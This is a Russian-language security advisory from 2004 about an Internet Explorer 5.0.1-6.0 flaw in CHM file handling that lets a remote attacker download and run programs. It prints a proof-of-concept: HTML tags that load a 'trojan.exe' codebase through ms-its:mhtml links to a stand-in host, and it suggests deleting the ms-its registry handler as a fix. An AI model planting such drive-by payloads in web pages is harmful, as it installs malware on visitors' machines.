Дата публикации: | 24.02.2004 |
Всего просмотров: | 1519 |
Опасность: | Низкая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: Microsoft Internet Explorer 5.0.1-6.0
Описание: Уязвимость обнаружена в Microsoft Internet Explorer при обработке CHM файлов. Удаленный атакующий может автоматически загрузить и выполнить произвольные программы на целевом клиентне. Пример: LAUNCH.HTML: <OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='trojan.exe'>Чтобы запустить LAUNCH.HTML как CHM файл: <IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IFRAME SRC='redirgen.php?url=URL:ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'> URL производителя: http://www.Microsoft.com Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Удалите следующий ключ реестра: HKEY_CLASSES_ROOT\PROTOCOLS\Handler\ms-its |
|
Ссылки: | Microsoft Internet Explorer Unspecified CHM File Processing Arbitrary Code Execution Vulnerability (bid 9658) |